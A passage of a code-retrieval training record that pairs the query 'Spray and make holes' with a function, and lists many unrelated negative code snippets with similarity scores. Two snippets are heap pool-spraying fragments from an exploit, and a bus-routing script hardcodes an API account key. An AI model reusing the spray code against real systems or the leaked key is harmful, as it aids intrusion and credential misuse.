(width, height), 0.0),\n pymunk.Segment(space.static_body, (width, height), (0.0, height), 0.0),\n pymunk.Segment(space.static_body, (0.0, 600.0), (0.0, 0.0), 0.0)]\n for line in static_lines:\n line.friction = 0.5\n line.elasticity = 0.9\n\n return static_lines", "def test_rocket():\n ring = [(0,0), (10, 0), (15,5), (10,9), (1,7), (6,4), (0,0)]\n conv = ToPointsAndSegments()\n conv.add_polygon([ring])\n skel = calc_skel(conv, output=True, pause=True)\n print \"DONE\"", "def box_mesh_with_hole(point1=Point(0,0,0), point2=Point(2,1,1), cyl_cent1 = Point(1, -10, 0.5), \n cyl_cent2= Point(1, 10, 0.5), cyl_rad=0.25, numpts=15):\n Router = mshr.Box(point1, point2)\n Rinner = mshr.Cylinder(cyl_cent1, cyl_cent2, cyl_rad, cyl_rad)\n domain = Router - Rinner\n\n mesh = mshr.generate_mesh(domain, numpts)\n print_mesh_stats(mesh)\n \n return mesh", "def ggpl_spiral_staircase(dx,dy,dz):\n\tnstep = int(dy*2.7)+1\n\t\"\"\" steps parameters \"\"\"\n\triserHeight = (0.50*dy)/nstep\n\ttreadDept = (0.6300-riserHeight)/2.0\n\t\"\"\" number of steps and length of landing for each side \"\"\"\n\tlandingLengthY=dy-((nstep+1)*treadDept)\n\tif dx>dy:\n\t\tstepWidth = landingLengthY\n\telse:\n\t\tstepWidth = dx/2.5\n\t\tlandingLengthY = stepWidth\n\tnsteplatox = int(((dx-2*stepWidth)/treadDept)+0.5) \n\tlandingLengthX=stepWidth\n\tnsteplatoy = int(((dy-stepWidth-landingLengthY)/treadDept)+0.5)\n\t\"\"\" skeleton of the box that contains the stair \"\"\"\n\tbox = SKEL_1(CUBOID([dx,dy,dz]))\n\t\"\"\" total steps \"\"\"\n\ttotalSteps = int((dz/riserHeight))\n\t\"\"\" number and height of floor \"\"\"\n\tnfloor = int(round(dz/2)+1)\n\theightfloor = (nsteplatoy)*riserHeight\n\t\"\"\" first stair \"\"\"\n\tstair=make_stair(nsteplatoy,treadDept,riserHeight,landingLengthY+treadDept,stepWidth,1)\n\tstair = T(2)([dy-((nsteplatoy+2)*treadDept)-landingLengthY]) (stair)\n\t\"\"\" variable that takes into account the number of steps made \"\"\"\n\trealizedStep = nsteplatoy\n\tr =4\n\n\t\"\"\" realization of the stairs \"\"\"\n\tfor j in range(int(nfloor)*2):\n\t\t\"\"\" condition for the realization of the final stair \"\"\"\n\t\tif (totalSteps-realizedStep<=nsteplatox) or (totalSteps-realizedStep<=nsteplatoy):\n\t\t\tif (totalSteps-realizedStep<=nsteplatox) and r%2==1:\n\t\t\t\tfinalStair = make_stair((totalSteps-realizedStep-1),treadDept,riserHeight,dy-stepWidth-(totalSteps-realizedStep-1)*treadDept,stepWidth,2)\n\t\t\telse:\n\t\t\t\tfinalStair = make_stair((totalSteps-realizedStep-1),treadDept,riserHeight,dx-stepWidth-(totalSteps-realizedStep-1)*treadDept,stepWidth,2)\n\t\t\t\t\"\"\" rotation and translation of the scale in the correct position \"\"\"\n\t\t\tif r==4:\n\t\t\t\tfinalStair=R([1,2])(3*PI/2)(finalStair)\n\t\t\t\tfinalStair = T([1,2,3])([stepWidth-treadDept,dy,heightfloor])(finalStair)\n\t\t\t\tstair = STRUCT([stair,finalStair])\n\t\t\t\tbreak\n\t\t\tif r==1:\n\t\t\t\tfinalStair = R([1,2])(PI)(finalStair)\n\t\t\t\tfinalStair = T([1,2,3])([dx,dy-landingLengthY+treadDept ,heightfloor])(finalStair)\n\t\t\t\tstair = STRUCT([stair,finalStair])\n\t\t\t\tbreak\n\t\t\tif r==2:\n\t\t\t\tfinalStair = R([1,2])(PI/2)(finalStair)\n\t\t\t\tfinalStair = T([1,2,3])([dx-landingLengthY+treadDept,0,heightfloor])(finalStair)\n\t\t\t\tstair = STRUCT([stair,finalStair])\n\t\t\t\tbreak\n\t\t\tif r==3:\n\t\t\t\tfinalStair = T([1,2,3])([0,stepWidth-treadDept,heightfloor])(finalStair)\n\t\t\t\tstair = STRUCT([stair,finalStair])\n\t\t\t\tbreak\n\n\t\telse:\n\t\t\tif j%4== 0:\n\t\t\t\tstepsX = make_stair(nsteplatox,treadDept,riserHeight,landingLengthX,stepWidth,1)\n\t\t\t\tstepsX = R([1,2])(3*PI/2)(stepsX)\n\t\t\t\tstepsX = T([1,2,3])([stepWidth-treadDept,dy,heightfloor])(stepsX)\n\t\t\t\tstair = STRUCT([stair,stepsX])\n\t\t\t\theightfloor += (nsteplatox+1)*riserHeight \n\t\t\t\trealizedStep += nsteplatox+1\n\t\t\t\tr=1\n\t\t\tif j%4== 1:\n\t\t\t\tstepsY = make_stair(nsteplatoy,treadDept,riserHeight,dy-nsteplatoy*treadDept-stepWidth,stepWidth,1)\n\t\t\t\tstepsY = R([1,2])(PI)(stepsY)\n\t\t\t\tstepsY = T([1,2,3])([dx,dy-landingLengthY+treadDept ,heightfloor])(stepsY)\n\t\t\t\tstair = STRUCT([stair,stepsY])\n\t\t\t\theightfloor += (nsteplatoy+1)*riserHeight \n\t\t\t\trealizedStep += nsteplatoy+1\n\t\t\t\tr=2\n\t\t\tif j%4== 2:\n\t\t\t\tstepsX = make_stair(nsteplatox,treadDept,riserHeight,landingLengthX,stepWidth,1)\n\t\t\t\tstepsX = R([1,2])(PI/2)(stepsX)\n\t\t\t\tstepsX = T([1,2,3])([dx-landingLengthY+treadDept,0,heightfloor])(stepsX)\n\t\t\t\tstair = STRUCT([stair,stepsX])\n\t\t\t\theightfloor += (nsteplatox+1)*riserHeight \n\t\t\t\trealizedStep += nsteplatox+1\n\t\t\t\tr=3\n\t\t\tif j%4== 3:\n\t\t\t\tstepsY = make_stair(nsteplatoy,treadDept,riserHeight,landingLengthY,stepWidth,1)\n\t\t\t\tstepsY = T([1,2,3])([0,stepWidth-treadDept,heightfloor])(stepsY)\n\t\t\t\tstair = STRUCT([stair,stepsY])\n\t\t\t\theightfloor += (nsteplatoy+1)*riserHeight \n\t\t\t\trealizedStep += nsteplatoy+1\n\t\t\t\tr=4\n\t\"\"\"floor of the stair\"\"\"\n\tfloor = CUBOID([dx,dy,0.05])\n\tfloor = TEXTURE(\"texture/floorStair.jpg\")(floor)\n\n\treturn STRUCT([stair,floor,box])" ]
[ "0.6130862", "0.61268944", "0.5979253", "0.5935735", "0.5710431", "0.567426", "0.56603324", "0.5653988", "0.5588994", "0.55683285", "0.55645317", "0.55300486", "0.5513504", "0.5508904", "0.54200655", "0.54176503", "0.5407196", "0.5399554", "0.538092", "0.5374664", "0.5373729", "0.5362313", "0.535844", "0.5353101", "0.527628", "0.52744824", "0.52705187", "0.52689344", "0.52563316", "0.524977" ]
0.6215994
0
Spray and make holes
def gimme_the_hole(required_hole_size): good_object = spray(required_hole_size) make_hole(required_hole_size, good_object) return good_object
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def spray(required_hole_size):\n\tglobal pool_object_handles\n\tgood_object = find_object_to_spray(required_hole_size)\n\tfor i in range(SPRAY_COUNT):\n\t\tpool_object_handles.append(allocate_object(good_object, i))\n\tprint \"[+] Spray done!\"\n\treturn good_object", "def route(self):\n pass", "def routes(self, body):\n pass", "def main():\n\n context = yield from Context.create_client_context()\n\n yield from asyncio.sleep(2)\n\n payload = b\"0\"\n request = Message(code=PUT, payload=payload)\n request.opt.uri_host = '192.168.3.2'\n request.opt.uri_path = (\"nodes\", \"48102\", \"humidity\")\n\n response = yield from context.request(request).response\n\n print('Result: %s\\n%r'%(response.code, response.payload))", "def server():", "def server():", "def ring(self):\n pass", "def route( request, c ):", "def receiver():\n def generate(entities_to_proceed):\n \"\"\"Process list of entities populating them with altitude data\"\"\"\n yield \"[\"\n for index, entity in enumerate(entities_to_proceed):\n if logging.getLogger().isEnabledFor(logging.DEBUG):\n logging.debug(\"processing entity : %s\", entity)\n else:\n logging.info(\"processing entity : %s\", entity.get(GUID_STR))\n\n if index > 0:\n yield \",\"\n booking_guid = entity.get(GUID_STR)\n iata = entity.get(IATA_STR)\n api_key = resolve_api_key(API_KEYS, iata)\n\n if not isinstance(api_key, str):\n entity[PROP] = []\n yield json.dumps(entity)\n continue\n url = URL_TEMPLATE.render(entity) + booking_guid + \"?api_key=\" + api_key\n if METHOD == \"get\":\n entity[PROP] = requests.get(url, headers=HEADERS).json()\n else:\n entity[PROP] = requests.request(METHOD, url, data=entity.get(\"payload\"),\n headers=HEADERS).json()\n yield json.dumps(entity)\n yield \"]\"\n\n # get entities from request\n entities = request.get_json()\n\n # create the response\n logging.debug(\"Processing %i entities\", len(entities))\n return Response(generate(entities), mimetype='application/json')", "def index():\n # curl -k -X POST https://127.0.0.1:43210/api/v1.0 -H 'content-type: application/json' -d '{\"data\": \"exhaust\"}'\n return jsonify({'meta': {'success': True, 'code': 200}, 'result': {\"message\": request.get_json()}}), 200", "def StartDrillHole(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def monkey_patch_requests_for_xray():\n wrapt.wrap_function_wrapper(\n \"requests.sessions\", \"Session.send\", xray_requests_send,\n )", "def gen_livestream():\n\n flag = True\n frame = _dog()\n while True:\n time.sleep(0.02)\n if app.images.qsize():\n image = app.images.get()\n if flag:\n image = base64_to_cv2(image)\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n detector = dlib.get_frontal_face_detector()\n rects = detector(gray, 0)\n for (i, rect) in enumerate(rects):\n shape = predictor(gray, rect)\n shape = face_utils.shape_to_np(shape)\n \n for (x, y) in shape:\n cv2.circle(image, (x, y), 2, (0, 255, 0), -1)\n _, frame = cv2.imencode('.jpg', image)\n else:\n frame = _dog()\n # print(position)\n flag = not flag\n # yield ('Content-Type: image/jpeg\\r\\n\\r\\n' + base64.b64encode(frame).decode(\"utf-8\") + '\\r\\n')\n\n yield (b'--frame\\r\\n'\n b'Content-Type: image/jpeg\\r\\n\\r\\n' + frame + b'\\r\\n')", "def protect_endpoint():\n pass", "def walk_bus_algor(start,end):\n #---CLASSES---#\n class my_dictionary(dict):\n \"\"\"\n Creates a dictionary\n \"\"\"\n def __init__(self):\n self = dict()\n def add(self, key, value):\n self[key] = value\n\n #---FUNCTIONS---#\n def bus_layer(start,end, results, case):\n \"\"\"\n It generates a bus route with the bus numbers via greedy algorithm\n\n Parameters\n ----------\n start : node id\n end : node id\n results : dict (From lta datamall)\n case : int\n Returns\n -------\n final_route_list : list\n \"\"\"\n def overpass_request(data, pause_duration=None, timeout=180, error_pause_duration=None):\n \"\"\"\n Send a request to the Overpass API via HTTP POST and return the JSON\n response.\n Parameters\n ----------\n data : dict or OrderedDict\n key-value pairs of parameters to post to the API\n pause_duration : int\n how long to pause in seconds before requests, if None, will query API\n status endpoint to find when next slot is available\n timeout : int\n the timeout interval for the requests library\n error_pause_duration : int\n how long to pause in seconds before re-trying requests if error\n Returns\n -------\n dict\n \"\"\"\n\n # define the Overpass API URL, then construct a GET-style URL as a string to\n # hash to look up/save to cache\n url = settings.overpass_endpoint.rstrip('/') + '/interpreter'\n prepared_url = requests.Request('GET', url, params=data).prepare().url\n cached_response_json = get_from_cache(prepared_url)\n\n if cached_response_json is not None:\n # found this request in the cache, just return it instead of making a\n # new HTTP call\n return cached_response_json\n\n else:\n # if this URL is not already in the cache, pause, then request it\n if pause_duration is None:\n this_pause_duration = get_pause_duration()\n log('Pausing {:,.2f} seconds before making API POST request'.format(this_pause_duration))\n time.sleep(this_pause_duration)\n start_time = time.time()\n log('Posting to {} with timeout={}, \"{}\"'.format(url, timeout, data))\n response = requests.post(url, data=data, timeout=timeout, headers=get_http_headers())\n\n # get the response size and the domain, log result\n size_kb = len(response.content) / 1000.\n domain = re.findall(r'(?s)//(.*?)/', url)[0]\n log('Downloaded {:,.1f}KB from {} in {:,.2f} seconds'.format(size_kb, domain, time.time() - start_time))\n\n try:\n response_json = response.json()\n if 'remark' in response_json:\n log('Server remark: \"{}\"'.format(response_json['remark'], level=lg.WARNING))\n save_to_cache(prepared_url, response_json)\n except Exception:\n # 429 is 'too many requests' and 504 is 'gateway timeout' from server\n # overload - handle these errors by recursively calling\n # overpass_request until we get a valid response\n if response.status_code in [429, 504]:\n # pause for error_pause_duration seconds before re-trying request\n if error_pause_duration is None:\n error_pause_duration = get_pause_duration()\n log(\n 'Server at {} returned status code {} and no JSON data. Re-trying request in {:.2f} seconds.'.format(\n domain,\n response.status_code,\n error_pause_duration),\n level=lg.WARNING)\n time.sleep(error_pause_duration)\n response_json = overpass_request(data=data, pause_duration=pause_duration, timeout=timeout)\n\n # else, this was an unhandled status_code, throw an exception\n else:\n log('Server at {} returned status code {} and no JSON data'.format(domain, response.status_code),\n level=lg.ERROR)\n raise Exception(\n 'Server returned no JSON data.\\n{} {}\\n{}'.format(response, response.reason, response.text))\n\n return response_json\n def get_node(element):\n \"\"\"\n Convert an OSM node element into the format for a networkx node.\n\n Parameters\n ----------\n element : dict\n an OSM node element\n\n Returns\n -------\n dict\n \"\"\"\n useful_tags_node = ['ref', 'highway', 'route_ref', 'asset_ref']\n\n node = {}\n node['y'] = element['lat']\n node['x'] = element['lon']\n node['osmid'] = element['id']\n\n\n if 'tags' in element:\n for useful_tag in useful_tags_node:\n if useful_tag in element['tags']:\n node[useful_tag] = element['tags'][useful_tag]\n return node\n def get_path(element,element_r):\n \"\"\"\n Convert an OSM way element into the format for a networkx graph path.\n\n Parameters\n ----------\n element : dict\n an OSM way element\n element_r : dict\n an OSM way element\n\n Returns\n -------\n dict\n \"\"\"\n useful_tags_path_e = ['bridge', 'tunnel', 'oneway', 'lanes', 'name',\n 'highway', 'maxspeed', 'service', 'access', 'area',\n 'landuse', 'width', 'est_width', 'junction']\n\n useful_tags_path_r = ['bridge', 'tunnel', 'oneway', 'lanes', 'ref', 'direction', 'from', 'to', 'name',\n 'highway', 'maxspeed', 'service', 'access', 'area',\n 'landuse', 'width', 'est_width', 'junction']\n\n\n\n path = {}\n path['osmid'] = element['id']\n\n # remove any consecutive duplicate elements in the list of nodes\n grouped_list = groupby(element['nodes'])\n path['nodes'] = [group[0] for group in grouped_list]\n\n\n\n if 'tags' in element:\n # for relation in element_r['elements']:\n # if relation['type'] == 'relation':\n # for members in relation['members']:\n # if members['ref'] == element['id']:\n for useful_tag in useful_tags_path_e:\n if useful_tag in element['tags']:\n path[useful_tag] = element['tags'][useful_tag]\n # for useful_tag in useful_tags_path_r:\n # if useful_tag in relation['tags']:\n # try:\n # path[useful_tag] = path[useful_tag] + \";\" + relation['tags'][useful_tag]\n # except KeyError:\n # path[useful_tag] = relation['tags'][useful_tag]\n # pass\n\n return path\n def parse_osm_nodes_paths(osm_data):\n \"\"\"\n Construct dicts of nodes and paths with key=osmid and value=dict of\n attributes.\n\n Parameters\n ----------\n osm_data : dict\n JSON response from from the Overpass API\n\n Returns\n -------\n nodes, paths : tuple\n \"\"\"\n\n nodes = {}\n paths = {}\n relation = {}\n\n # for element in osm_data['elements']:\n # if element['type'] == 'relation':\n\n\n for element in osm_data['elements']:\n if element['type'] == 'node':\n key = element['id']\n nodes[key] = get_node(element)\n\n elif element['type'] == 'way': #osm calls network paths 'ways'\n key = element['id']\n # pp.pprint(element)\n paths[key] = get_path(element,osm_data)\n\n return nodes, paths\n def create_graph(response_jsons, name='unnamed', retain_all=True, bidirectional=False):\n \"\"\"\n Create a networkx graph from Overpass API HTTP response objects.\n\n Parameters\n ----------\n response_jsons : list\n list of dicts of JSON responses from from the Overpass API\n name : string\n the name of the graph\n retain_all : bool\n if True, return the entire graph even if it is not connected\n bidirectional : bool\n if True, create bidirectional edges for one-way streets\n\n Returns\n -------\n networkx multidigraph\n \"\"\"\n\n log('Creating networkx graph from downloaded OSM data...')\n start_time = time.time()\n\n # make sure we got data back from the server requests\n elements = []\n # for response_json in response_jsons:\n elements.extend(response_json['elements'])\n if len(elements) < 1:\n raise EmptyOverpassResponse('There are no data elements in the response JSON objects')\n\n # create the graph as a MultiDiGraph and set the original CRS to default_crs\n G = nx.MultiDiGraph(name=name, crs=settings.default_crs)\n\n # extract nodes and paths from the downloaded osm data\n nodes = {}\n paths = {}\n # for osm_data in response_jsons:\n nodes_temp, paths_temp = parse_osm_nodes_paths(response_jsons)\n for key, value in nodes_temp.items():\n nodes[key] = value\n for key, value in paths_temp.items():\n paths[key] = value\n\n # add each osm node to the graph\n for node, data in nodes.items():\n G.add_node(node, **data)\n\n # add each osm way (aka, path) to the graph\n G = ox.add_paths(G, paths, bidirectional=bidirectional)\n\n # retain only the largest connected component, if caller did not\n # set retain_all=True\n if not retain_all:\n G = get_largest_component(G)\n\n log('Created graph with {:,} nodes and {:,} edges in {:,.2f} seconds'.format(len(list(G.nodes())), len(list(G.edges())), time.time()-start_time))\n\n # add length (great circle distance between nodes) attribute to each edge to\n # use as weight\n if len(G.edges) > 0:\n G = ox.add_edge_lengths(G)\n\n return G\n def calculate_H(s_lat,s_lon,e_lat,e_lon):\n \"\"\"\n Calculate a distance with x,y coordinates with\n\n Parameters\n ----------\n s_lat : float (starting lat)\n s_lon : float (starting lon)\n e_lat : float (ending lat)\n e_lon : float (ending lon)\n\n Returns\n -------\n distance\n \"\"\"\n R = 6371.0\n snlat = radians(s_lat)\n snlon = radians(s_lon)\n elat = radians(e_lat)\n elon = radians(e_lon)\n actual_dist = 6371.01 * acos(sin(snlat) * sin(elat) + cos(snlat) * cos(elat) * cos(snlon - elon))\n actual_dist = actual_dist * 1000\n return actual_dist\n def bus_details_SD(adjacent_list):\n \"\"\"\n store all details from LTA data mall into dictionary\n\n Parameters\n ----------\n adjacent_list : dict\n\n Returns\n -------\n adjacent_list : dict\n \"\"\"\n\n temp = 0\n for x in results:\n if temp != x.get('ServiceNo'):\n temp = x.get('ServiceNo')\n count = 0\n adja_bus_stop = my_dictionary()\n adjacent_list.add(temp, adja_bus_stop)\n adja_bus_stop.add(count, [x.get('BusStopCode'), x.get('Distance')])\n count += 1\n else:\n adja_bus_stop.add(count, [x.get('BusStopCode'), x.get('Distance')])\n count += 1\n return adjacent_list\n def get_nearestedge_node(osm_id, a, G):\n \"\"\"\n Find the nearest node available in Open street map\n\n Parameters\n ----------\n osm_id : node ID\n a : plotting graph\n g : bus graph\n\n Returns\n -------\n temp_nearest_edge[1]/temp_nearest_edge[2] : nearest node to a way ID\n \"\"\"\n temp_y = G.nodes.get(osm_id).get('y')\n temp_x = G.nodes.get(osm_id).get('x')\n temp_nearest_edge = ox.get_nearest_edge(a, (temp_y, temp_x))\n temp_1 = temp_nearest_edge[0].coords[0]\n temp_2 = temp_nearest_edge[0].coords[1]\n temp1_x = temp_1[0]\n temp1_y = temp_1[1]\n temp_1_distance = calculate_H(temp1_y,temp1_x,temp_y,temp_x)\n\n temp2_x = temp_2[0]\n temp2_y = temp_2[1]\n temp_2_distance = calculate_H(temp2_y,temp2_x,temp_y,temp_x)\n if temp_1_distance < temp_2_distance:\n return temp_nearest_edge[1]\n else:\n return temp_nearest_edge[2]\n def delete_duplicate(x):\n \"\"\"\n Delete duplicate within a list\n\n Parameters\n ----------\n x : list\n\n Returns\n -------\n list\n \"\"\"\n return list(dict.fromkeys(x))\n def request_busG():\n \"\"\"\n Find all nodes that is a bus stop\n\n Returns\n -------\n busG : dict\n \"\"\"\n busG = {}\n for x in G.nodes.items():\n if x[1].get('highway') == 'bus_stop':\n xy = []\n xy.append(x[1].get('osmid'))\n xy.append(x[1].get('x'))\n xy.append(x[1].get('y'))\n busG[x[1].get('osmid')] = xy\n\n return busG\n\n # ---MAIN---#\n\n query_str = '[out:json][timeout:180];node[\"type\"=\"route\"](1.385700,103.887300,1.422000,103.925900);way[\"type\"=\"route\"](1.385700,103.887300,1.422000,103.925900);(relation[\"type\"=\"route\"](1.385700,103.887300,1.422000,103.925900);>;);out;'\n response_json = overpass_request(data={'data': query_str}, timeout=180)\n pp = pprint.PrettyPrinter(indent=4)\n # start = 1847853709\n # end = 410472575\n # end = 3737148763\n # bus transit\n # start = 2110621974\n # end = 2085845884\n\n adjacent_list = my_dictionary()\n\n G = ox.load_graphml('Bus_Overpass.graphml')\n\n if case == 1:\n return request_busG()\n n, e = ox.graph_to_gdfs(G)\n # e.to_csv(\"Edge_test_busstop.csv\")\n if len(results) == 0:\n\n results = bus_details_all(results) # Details from LTA Datamall, extracting all details such as service no, bus stop number\n\n adjacent_list = bus_details_SD(adjacent_list) # From results, it extracts bus stop number and distance\n start_busstop = (G.nodes.get(start)).get('asset_ref')\n end_busstop = (G.nodes.get(end)).get('asset_ref')\n\n #Start finding common bus service within the start bus stop and end bus stop\n try:\n if \";\" in (G.nodes.get(start).get('route_ref')):\n start_rr = (G.nodes.get(start).get('route_ref')).split(\";\")\n else:\n start_rr = []\n start_rr.append((G.nodes.get(start).get('route_ref')))\n print(\"TEST - G.nodes.get(end): \", G.nodes.get(end))\n if \";\" in (G.nodes.get(end).get('route_ref')):\n end_rr = (G.nodes.get(end).get('route_ref')).split(\";\")\n else:\n end_rr = []\n end_rr.append((G.nodes.get(end).get('route_ref')))\n common = list(set(start_rr) & set(end_rr))\n except:\n return -1\n\n \"\"\"\n This method strictly emphasis on greedy algorithm. Thus it will prioritze the numbers of transit rather than distance\n Check if any common bus service within start and end bus stop.\n If found, route_list will capture the entire route of the common bus service \n No transit will occuer as it is a straight path, start busstop -> end busstop\n If not found, the program will proceed to find a common bus stop within the start and end bus services. \n Thus a transit will occur, start busstop -> mid busstop -> end busstop\n \"\"\"\n route_list = {}\n mid_route_list = {}\n # print(\"TEST - Start: \", start_busstop)\n # print(\"TEST - End: \", end_busstop)\n # print(\"TEST - start_rr: \", start_rr)\n # print(\"TEST - end_rr: \", end_rr)\n # print(\"TEST - Common: \", common)\n common_mid = []\n if len(common) == 0: #No common bus service found\n while(len(common_mid) == 0): #Start finding a common mid busstop\n rona_one = []\n rona_two = []\n for start_to_mid in start_rr: #Capture all common mid busstop\n print(\"TEST - start_to_mid: \", start_to_mid)\n for bus_sequence in adjacent_list.get(start_to_mid):\n rona_one.append(str(adjacent_list.get(start_to_mid).get(bus_sequence)[0]))\n for mid_to_end in end_rr:\n print(\"TEST - mid_to_end: \", mid_to_end)\n for bus_sequence in adjacent_list.get(mid_to_end):\n rona_two.append(str(adjacent_list.get(mid_to_end).get(bus_sequence)[0]))\n found_br = []\n print(\"TEST rona 1:\", rona_one)\n print (\"TEST rona 2:\", rona_two)\n found_br.append(start_to_mid+\";\"+mid_to_end)\n found_br.extend(list(set(rona_one)&set(rona_two)))\n common_mid.append(found_br)\n\n print(\"TEST - common_mid: \",common_mid)\n\n bus_service = start_to_mid\n temp_bus = []\n mid_busstop = 0\n approved = 0\n for bus_sequence in adjacent_list.get(bus_service): #Finding bus service for start busstop -> mid busstop\n for x in range (0, len(common_mid)):\n for i in common_mid[x]:\n if str(adjacent_list.get(bus_service).get(bus_sequence)[0]) == str(start_busstop):\n temp_bus.append(adjacent_list.get(bus_service).get(bus_sequence)[0])\n approved = 1\n if str(adjacent_list.get(bus_service).get(bus_sequence)[0]) == str(i) and approved == 1:\n mid_busstop = str(i)\n temp_bus.append(adjacent_list.get(bus_service).get(bus_sequence)[0])\n approved = 0\n break\n if approved == 1:\n temp_bus.append(adjacent_list.get(bus_service).get(bus_sequence)[0])\n if mid_busstop != 0:\n break\n if str(start_busstop) not in temp_bus or str(mid_busstop) not in temp_bus: #If not found, continue to next loop\n continue\n temp_bus = delete_duplicate(temp_bus)\n mid_route_list[bus_service] = temp_bus\n\n for x in G.nodes: #After finding bus service to mid busstop, start finding path mid busstop to end busstop\n if G.nodes.get(x).get('asset_ref') == mid_busstop:\n if \";\" in (G.nodes.get(x).get('route_ref')):\n start_rr = (G.nodes.get(x).get('route_ref')).split(\";\")\n else:\n start_rr = []\n start_rr.append((G.nodes.get(start).get('route_ref')))\n\n common = list(set(start_rr) & set(end_rr))\n start_busstop = mid_busstop\n if start == 1847853709: #If bus service started from punggol interchange\n for bus_service in common:\n temp_bus = []\n approved = 0\n for bus_sequence in adjacent_list.get(bus_service): #Capture bus route\n if str(adjacent_list.get(bus_service).get(bus_sequence)[0]) == str(start_busstop) and adjacent_list.get(bus_service).get(bus_sequence)[1] == 0:\n temp_bus.append(adjacent_list.get(bus_service).get(bus_sequence)[0])\n approved = 1\n if str(adjacent_list.get(bus_service).get(bus_sequence)[0]) == str(end_busstop) and approved == 1:\n temp_bus.append(adjacent_list.get(bus_service).get(bus_sequence)[0])\n approved = 0\n break\n if approved == 1:\n temp_bus.append(adjacent_list.get(bus_service).get(bus_sequence)[0])\n if str(start_busstop) not in temp_bus or str(end_busstop) not in temp_bus:\n continue\n route_list[bus_service] = temp_bus\n else:\n for bus_service in common: #If bus service does not start from punggol interchange\n temp_bus = []\n approved = 0\n for bus_sequence in adjacent_list.get(bus_service): #Capture bus route\n if str(adjacent_list.get(bus_service).get(bus_sequence)[0]) == str(start_busstop):\n temp_bus.append(adjacent_list.get(bus_service).get(bus_sequence)[0])\n approved = 1\n if str(adjacent_list.get(bus_service).get(bus_sequence)[0]) == str(end_busstop) and approved == 1:\n temp_bus.append(adjacent_list.get(bus_service).get(bus_sequence)[0])\n approved = 0\n break\n if approved == 1:\n temp_bus.append(adjacent_list.get(bus_service).get(bus_sequence)[0])\n if str(start_busstop) not in temp_bus or str(end_busstop) not in temp_bus:\n continue\n route_list[bus_service] = temp_bus\n\n \"\"\"\n After capturing all the bus serivce. A comparison is made in favor for the number of bus stops\n It will choose the least amount of bus stops and store in post_compare\n \"\"\"\n compare = [0, 100]\n if len(route_list.keys()) > 1:\n for i in route_list:\n if len(route_list.get(i)) < compare[1]:\n compare[0] = i\n compare[1] = len(route_list.get(i))\n else:\n for i in route_list:\n compare[0] = i\n compare[1] = len(route_list.get(i))\n post_compare = []\n print(\"TEST - Mid route list: \", mid_route_list)\n if len(mid_route_list) != 0:\n for i in mid_route_list:\n post_compare.append(i)\n route_list[i] = mid_route_list.get(i)\n post_compare.append(compare[0])\n else:\n post_compare.append(compare[0])\n\n\n\n \"\"\"\n Upon comparison, it will start capturing the nodes within the bus path and store in plot_list\n \"\"\"\n plot_list = []\n try:\n print(\"TEST - post_Compare: \", post_compare)\n print(\"TEST - Route list: \", route_list)\n for count in range (0, len(post_compare)):\n for x in route_list.get(str(post_compare[count])):\n for i in G.nodes:\n if str(G.nodes.get(i).get('asset_ref')) == str(x):\n plot_list.append(G.nodes.get(i).get('osmid'))\n break\n except:\n return -1\n edge_list = []\n punggol = (1.403948, 103.909048)\n \"\"\"\n It will generate out the list of node ID for the UI to plot\n \"\"\"\n a = ox.load_graphml('Bus_graph.graphml')\n for x in plot_list:\n edge_list.append(get_nearestedge_node(x,a,G))\n\n print(\"TEST - Plot list: \", plot_list)\n print(\"TEST - Edge list: \", edge_list)\n final_route_list = []\n count_stops = len(plot_list)\n for x in range (0, len(edge_list)-1):\n final_route_list.append(nx.shortest_path(a, edge_list[x], edge_list[x+1]))\n print(final_route_list)\n return final_route_list\n\n def bus_details_all():\n headers = {\n 'AccountKey': '84lbH3B/QeOkRK/CHm3c2w==',\n 'UniqueUserID': '8ecabd56-08a2-e843-0a7a-9944dccf124a',\n 'accept': 'application/json'\n }\n global new_results\n if __name__ == \"__main__\":\n results = []\n bus_stop_url = \"http://datamall2.mytransport.sg/ltaodataservice/BusRoutes\"\n\n while True:\n new_results = requests.get(bus_stop_url,headers=headers,params={'$skip': len(results)}).json()['value']\n if new_results == []:\n return results\n else:\n results += new_results\n def calculate_H(s_lat,s_lon,e_lat,e_lon): #y,x y,x\n R = 6371.0\n snlat = radians(s_lat)\n snlon = radians(s_lon)\n elat = radians(e_lat)\n elon = radians(e_lon)\n actual_dist = 6371.01 * acos(sin(snlat) * sin(elat) + cos(snlat) * cos(elat) * cos(snlon - elon))\n actual_dist = actual_dist * 1000\n return actual_dist\n def walk_pathfinder(start_osmid, end_osmid):\n priority_Q = []\n heap_Q = []\n closed_routes = {}\n start_node = (0, None, start_osmid, 0)\n heapq.heappush(heap_Q, (start_node))\n closed_routes[start_osmid] = None\n while(True):\n temp = heapq.heappop(heap_Q)\n if temp[2] == end_osmid:\n temp_end = end_osmid\n path = []\n path.append(end_osmid)\n while (temp_end is not None):\n temp_list = closed_routes.get(temp_end)\n if temp_list is not None:\n temp_end = temp_list[0]\n path.append(temp_end)\n else:\n final_path = path[::-1]\n return final_path\n\n for counter, x in enumerate(list(G.edges())[0:]):\n if x[0] == temp[2]:\n if x[1] in closed_routes:\n continue\n else:\n length = list(G.edges.values())[counter].get(\"length\", None)\n current_length = length + temp[3]\n slat = radians(G.nodes.get(x[1]).get('y'))\n slon = radians(G.nodes.get(x[1]).get('x'))\n dist = 6371.01 * acos(sin(slat) * sin(elat) + cos(slat) * cos(elat) * cos(slon - elon))\n H = dist*1000\n if H < actual_dist + 100:\n F = current_length + H\n heapq.heappush(heap_Q, (F, x[0], x[1], current_length))\n closed_routes[x[1]] = [x[0], length]\n def delete_duplicate(x):\n return list(dict.fromkeys(x))\n def get_nearestedge_node(osm_id, y , x):\n temp_nearest_edge = ox.get_nearest_edge(G, (y, x))\n temp_1 = temp_nearest_edge[0].coords[0]\n temp_2 = temp_nearest_edge[0].coords[1]\n temp1_x = temp_1[0]\n temp1_y = temp_1[1]\n temp_1_distance = calculate_H(temp1_y, temp1_x, y, x)\n temp2_x = temp_2[0]\n temp2_y = temp_2[1]\n temp_2_distance = calculate_H(temp2_y, temp2_x, y, x)\n if temp_1_distance < temp_2_distance:\n return [temp_nearest_edge[1],temp_1_distance,temp1_x,temp1_y]\n else:\n return [temp_nearest_edge[2],temp_2_distance,temp2_x,temp2_y]\n def find_XY(node, graph):\n for x in graph.nodes.items():\n if x[1].get('osmid') == node:\n node_x 